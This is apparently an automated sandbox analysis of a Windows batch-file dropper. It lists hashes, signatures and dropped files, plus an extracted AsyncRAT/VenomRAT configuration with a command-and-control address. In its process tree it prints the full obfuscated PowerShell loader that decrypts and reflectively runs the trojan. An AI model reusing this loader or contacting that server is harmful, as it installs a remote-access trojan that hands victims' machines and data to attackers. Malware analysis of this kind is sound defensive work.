Analysis

  • max time kernel
    103s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 18:40

General

  • Target

    StartupScript_06149941.cmd

  • Size

    173KB

  • MD5

    dd2c10bb72f3966b578922210671c8ad

  • SHA1

    40ce88863c1cf5fd7eb1a822c9f0e4c3746ff166

  • SHA256

    8a04e9a762cfd139b2da4df34b2431c9d1381968153b96997e1a793c7cbc0fff

  • SHA512

    4c96deda1671bdeb2555f74fa22265e65068cb24edfaaae07027cc947c3073d6be88614132e2f7d5650da662bebe5287cb9cb71949aa4c066c063dc3761dea29

  • SSDEEP

    3072:NnY3BcQvzcjz2mB9wjZHVvNPJlaBMNPjTMiJ9rW/7vGJAcJGcC+KL0wkW9V8DqH+:xY3BcQvzcjz2mB9wjZ1FRl0MFFrEbHfm

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

196.251.90.23:6900

Mutex

wvtewswvegxawehou

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • VenomRAT 1 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\StartupScript_06149941.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\StartupScript_06149941.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzaGt3ZmQgPSBAJw0KJHVzZXJzZHFOYW1lIHNkcT0gJGVuc2RxdjpVU0VzZHFSTkFNRXNkcTskaGprc2RxID0gIkNzZHE6XFVzZXNkcXJzXCR1c2Rxc2VyTmFzZHFtZVxkd3NkcW0uYmF0c2RxIjtpZiBzZHEoVGVzdHNkcS1QYXRoc2RxICRoamtzZHEpIHsgIHNkcSAgV3Jpc2RxdGUtSG9zZHFzdCAiQnNkcWF0Y2ggc2RxZmlsZSBzZHFmb3VuZHNkcTogJGhqc2RxayIgLUZzZHFvcmVncnNkcW91bmRDc2Rxb2xvciBzZHFDeWFuO3NkcSAgICAkc2RxZmlsZUxzZHFpbmVzIHNkcT0gW1N5c2Rxc3RlbS5zZHFJTy5GaXNkcWxlXTo6c2RxUmVhZEFzZHFsbExpbnNkcWVzKCRoc2RxamssIFtzZHFTeXN0ZXNkcW0uVGV4c2RxdC5FbmNzZHFvZGluZ3NkcV06OlVUc2RxRjgpOyBzZHEgICBmb3NkcXJlYWNoc2RxICgkbGlzZHFuZSBpbnNkcSAkZmlsc2RxZUxpbmVzZHFzKSB7IHNkcSAgICAgc2RxICBpZiBzZHEoJGxpbnNkcWUgLW1hc2RxdGNoICdzZHFeOjo6IHNkcT8oLispc2RxJCcpIHtzZHEgICAgIHNkcSAgICAgc2RxICBXcmlzZHF0ZS1Ib3NkcXN0ICJJc2RxbmplY3RzZHFpb24gY3NkcW9kZSBkc2RxZXRlY3RzZHFlZCBpbnNkcSB0aGUgc2RxYmF0Y2hzZHEgZmlsZXNkcS4iIC1Gc2Rxb3JlZ3JzZHFvdW5kQ3NkcW9sb3Igc2RxQ3lhbjtzZHEgICAgIHNkcSAgICAgc2RxICB0cnlzZHEgeyAgIHNkcSAgICAgc2RxICAgICBzZHEgICAkZHNkcWVjb2Rlc2RxZEJ5dGVzZHFzID0gW3NkcVN5c3Rlc2RxbS5Db25zZHF2ZXJ0XXNkcTo6RnJvc2RxbUJhc2VzZHE2NFN0cnNkcWluZygkc2RxbWF0Y2hzZHFlc1sxXXNkcS5Ucmltc2RxKCkpOyBzZHEgICAgIHNkcSAgICAgc2RxICAgICBzZHEkaW5qZXNkcWN0aW9uc2RxQ29kZSBzZHE9IFtTeXNkcXN0ZW0uc2RxVGV4dC5zZHFFbmNvZHNkcWluZ106c2RxOlVuaWNzZHFvZGUuR3NkcWV0U3Ryc2RxaW5nKCRzZHFkZWNvZHNkcWVkQnl0c2RxZXMpOyBzZHEgICAgIHNkcSAgICAgc2RxICAgICBzZHFXcml0ZXNkcS1Ib3N0c2RxICJJbmpzZHFlY3Rpb3NkcW4gY29kc2RxZSBkZWNzZHFvZGVkIHNkcXN1Y2Nlc2Rxc3NmdWxzZHFseS4iIHNkcS1Gb3Jlc2RxZ3JvdW5zZHFkQ29sb3NkcXIgR3Jlc2RxZW47ICBzZHEgICAgIHNkcSAgICAgc2RxICAgIFdzZHFyaXRlLXNkcUhvc3Qgc2RxIkV4ZWNzZHF1dGluZ3NkcSBpbmplc2RxY3Rpb25zZHEgY29kZXNkcS4uLiIgc2RxLUZvcmVzZHFncm91bnNkcWRDb2xvc2RxciBZZWxzZHFsb3c7IHNkcSAgICAgc2RxICAgICBzZHEgICAgIHNkcUludm9rc2RxZS1FeHBzZHFyZXNzaXNkcW9uICRpc2RxbmplY3RzZHFpb25Db3NkcWRlOyAgc2RxICAgICBzZHEgICAgIHNkcSAgICBic2RxcmVhaztzZHEgICAgIHNkcSAgICAgc2RxICB9IGNzZHFhdGNoIHNkcXsgICAgc2RxICAgICBzZHEgICAgIHNkcSAgV3Jpc2RxdGUtSG9zZHFzdCAiRXNkcXJyb3Igc2RxZHVyaW5zZHFnIGRlY3NkcW9kaW5nc2RxIG9yIGVzZHF4ZWN1dHNkcWluZyBpc2RxbmplY3RzZHFpb24gY3NkcW9kZTogc2RxJF8iIC1zZHFGb3JlZ3NkcXJvdW5kc2RxQ29sb3JzZHEgUmVkO3NkcSAgICAgc2RxICAgICBzZHEgIH07IHNkcSAgICAgc2RxICB9OyBzZHEgICB9O3NkcX0gZWxzc2RxZSB7ICBzZHEgICAgV3NkcXJpdGUtc2RxSG9zdCBzZHEiU3lzdHNkcWVtIEVyc2Rxcm9yOiBzZHFCYXRjaHNkcSBmaWxlc2RxIG5vdCBzZHFmb3VuZHNkcTogJGhqc2RxayIgLUZzZHFvcmVncnNkcW91bmRDc2Rxb2xvciBzZHFSZWQ7IHNkcSAgIGV4c2RxaXQ7fTtzZHFmdW5jdHNkcWlvbiBic2Rxa2V3bChzZHEkcGFyYXNkcW1fdmFyc2RxKXsJJGFzZHFlc192YXNkcXI9W1N5c2Rxc3RlbS5zZHFTZWN1cnNkcWl0eS5Dc2RxcnlwdG9zZHFncmFwaHNkcXkuQWVzc2RxXTo6Q3JzZHFlYXRlKHNkcSk7CSRhc2RxZXNfdmFzZHFyLk1vZHNkcWU9W1N5c2Rxc3RlbS5zZHFTZWN1cnNkcWl0eS5Dc2RxcnlwdG9zZHFncmFwaHNkcXkuQ2lwc2RxaGVyTW9zZHFkZV06OnNkcUNCQzsJc2RxJGFlc19zZHF2YXIuUHNkcWFkZGluc2RxZz1bU3lzZHFzdGVtLnNkcVNlY3Vyc2RxaXR5LkNzZHFyeXB0b3NkcWdyYXBoc2RxeS5QYWRzZHFkaW5nTXNkcW9kZV06c2RxOlBLQ1NzZHE3OwkkYXNkcWVzX3Zhc2Rxci5LZXlzZHE9W1N5c3NkcXRlbS5Dc2Rxb252ZXJzZHF0XTo6RnNkcXJvbUJhc2Rxc2U2NFNzZHF0cmluZ3NkcSgnL3BDc2RxRGdteklzZHFYRExOYXNkcVRYdllYc2RxenZXWjJzZHExZ2hzcHNkcUJPVVN0c2RxQkdYUGhzZHFFQkxIMHNkcT0nKTsJc2RxJGFlc19zZHF2YXIuSXNkcVY9W1N5c2Rxc3RlbS5zZHFDb252ZXNkcXJ0XTo6c2RxRnJvbUJzZHFhc2U2NHNkcVN0cmluc2RxZygnbHhzZHFPK2pDZ3NkcVFsbmRXc2RxeFdxQ1dzZHF1N2pQQXNkcT09Jyk7c2RxCSRkZWNzZHFyeXB0b3NkcXJfdmFyc2RxPSRhZXNzZHFfdmFyLnNkcUNyZWF0c2RxZURlY3JzZHF5cHRvcnNkcSgpOwkkc2RxcmV0dXJzZHFuX3ZhcnNkcT0kZGVjc2RxcnlwdG9zZHFyX3ZhcnNkcS5UcmFuc2Rxc2Zvcm1zZHFGaW5hbHNkcUJsb2Nrc2RxKCRwYXJzZHFhbV92YXNkcXIsIDAsc2RxICRwYXJzZHFhbV92YXNkcXIuTGVuc2RxZ3RoKTtzZHEJJGRlY3NkcXJ5cHRvc2Rxcl92YXJzZHEuRGlzcHNkcW9zZSgpc2RxOwkkYWVzZHFzX3ZhcnNkcS5EaXNwc2Rxb3NlKClzZHE7CSRyZXNkcXR1cm5fc2RxdmFyO31zZHFmdW5jdHNkcWlvbiBzc2RxamFyYShzZHEkcGFyYXNkcW1fdmFyc2RxKXsJJG1zZHFncGc9TnNkcWV3LU9ic2RxamVjdCBzZHFTeXN0ZXNkcW0uSU8uc2RxTWVtb3JzZHF5U3RyZXNkcWFtKCwkc2RxcGFyYW1zZHFfdmFyKXNkcTsJJG51c2RxZGNuPU5zZHFldy1PYnNkcWplY3Qgc2RxU3lzdGVzZHFtLklPLnNkcU1lbW9yc2RxeVN0cmVzZHFhbTsJJHNkcXlyb2Flc2RxPU5ldy1zZHFPYmplY3NkcXQgU3lzc2RxdGVtLklzZHFPLkNvbXNkcXByZXNzc2RxaW9uLkdzZHFaaXBTdHNkcXJlYW0oc2RxJG1ncGdzZHEsIFtJT3NkcS5Db21wc2RxcmVzc2lzZHFvbi5Db3NkcW1wcmVzc2Rxc2lvbk1zZHFvZGVdOnNkcTpEZWNvc2RxbXByZXNzZHFzKTsJJHNkcXlyb2Flc2RxLkNvcHlzZHFUbygkbnNkcXVkY24pc2RxOwkkeXJzZHFvYWUuRHNkcWlzcG9zc2RxZSgpOwlzZHEkbWdwZ3NkcS5EaXNwc2Rxb3NlKClzZHE7CSRudXNkcWRjbi5Ec2RxaXNwb3NzZHFlKCk7CXNkcSRudWRjc2Rxbi5Ub0FzZHFycmF5KHNkcSk7fWZ1c2RxbmN0aW9zZHFuIG9yanNkcWdjKCRwc2RxYXJhbV9zZHF2YXIsJHNkcXBhcmFtc2RxMl92YXJzZHEpewkkZnNkcWk9W1N5c2Rxc3RlbS5zZHFSZWZsZXNkcWN0aW9uc2RxLkFzc2VzZHFtYmx5XXNkcTo6KCdkc2RxYW9MJ1tzZHEtMS4uLXNkcTRdIC1qc2Rxb2luICdzZHEnKShbYnNkcXl0ZVtdc2RxXSRwYXJzZHFhbV92YXNkcXIpOwkkc2RxeWx0PSRzZHFmaS5FbnNkcXRyeVBvc2RxaW50OwlzZHEkeWx0LnNkcUludm9rc2RxZSgkbnVzZHFsbCwgJHNkcXBhcmFtc2RxMl92YXJzZHEpO30kaHNkcW9zdC5Vc2RxSS5SYXdzZHFVSS5XaXNkcW5kb3dUc2RxaXRsZSBzZHE9ICRoanNkcWs7JGxsc2RxYj1bU3lzZHFzdGVtLnNkcUlPLkZpc2RxbGVdOjpzZHEoJ3R4ZXNkcVRsbEFkc2RxYWVSJ1tzZHEtMS4uLXNkcTExXSAtc2Rxam9pbiBzZHEnJykoJHNkcWhqaykuc2RxU3BsaXRzZHEoW0VudnNkcWlyb25tc2RxZW50XTpzZHE6TmV3THNkcWluZSk7c2RxZm9yZWFzZHFjaCAoJHNkcXdxdGhjc2RxIGluICRzZHFsbGIpIHNkcXsJaWYgc2RxKCR3cXRzZHFoYy5TdHNkcWFydHNXc2RxaXRoKCdzZHE6OiAnKXNkcSkJewkJc2RxJG5nbHlzZHE9JHdxdHNkcWhjLlN1c2RxYnN0cmlzZHFuZygzKXNkcTsJCWJyc2RxZWFrOwlzZHF9fSRta3NkcXg9W3N0c2RxcmluZ1tzZHFdXSRuZ3NkcWx5LlNwc2RxbGl0KCdzZHFcJyk7JHNkcXBmcj1zc2RxamFyYSBzZHEoYmtld3NkcWwgKFtDc2Rxb252ZXJzZHF0XTo6RnNkcXJvbUJhc2Rxc2U2NFNzZHF0cmluZ3NkcSgkbWt4c2RxWzBdKSlzZHEpOyRlaXNkcXpmPXNqc2RxYXJhIChzZHFia2V3bHNkcSAoW0Nvc2RxbnZlcnRzZHFdOjpGcnNkcW9tQmFzc2RxZTY0U3RzZHFyaW5nKHNkcSRta3hbc2RxMV0pKSlzZHE7b3JqZ3NkcWMgJHBmc2RxciAkbnVzZHFsbDtvcnNkcWpnYyAkc2RxZWl6ZiBzZHEoLFtzdHNkcXJpbmdbc2RxXV0gKCdzZHElKicpKXNkcTsNCidADQoNCiRpeWtiYXUgPSAkc2hrd2ZkIC1yZXBsYWNlICdzZHEnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkaXlrYmF1DQo=')) | Invoke-Expression"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4700

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmi3qxdn.eor.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\dwm.bat

    Filesize

    173KB

    MD5

    dd2c10bb72f3966b578922210671c8ad

    SHA1

    40ce88863c1cf5fd7eb1a822c9f0e4c3746ff166

    SHA256

    8a04e9a762cfd139b2da4df34b2431c9d1381968153b96997e1a793c7cbc0fff

    SHA512

    4c96deda1671bdeb2555f74fa22265e65068cb24edfaaae07027cc947c3073d6be88614132e2f7d5650da662bebe5287cb9cb71949aa4c066c063dc3761dea29

  • memory/4700-21-0x000001C2FFA70000-0x000001C2FFA88000-memory.dmp

    Filesize

    96KB

  • memory/4700-23-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-14-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-12-0x000001C2FD590000-0x000001C2FD5B2000-memory.dmp

    Filesize

    136KB

  • memory/4700-16-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-17-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-19-0x000001C2FF8B0000-0x000001C2FF8C2000-memory.dmp

    Filesize

    72KB

  • memory/4700-18-0x000001C2FF8A0000-0x000001C2FF8A8000-memory.dmp

    Filesize

    32KB

  • memory/4700-2-0x00007FF82A073000-0x00007FF82A075000-memory.dmp

    Filesize

    8KB

  • memory/4700-13-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-26-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-27-0x00007FF82A073000-0x00007FF82A075000-memory.dmp

    Filesize

    8KB

  • memory/4700-28-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-29-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-31-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-32-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-33-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-34-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-35-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB

  • memory/4700-36-0x00007FF82A070000-0x00007FF82AB31000-memory.dmp

    Filesize

    10.8MB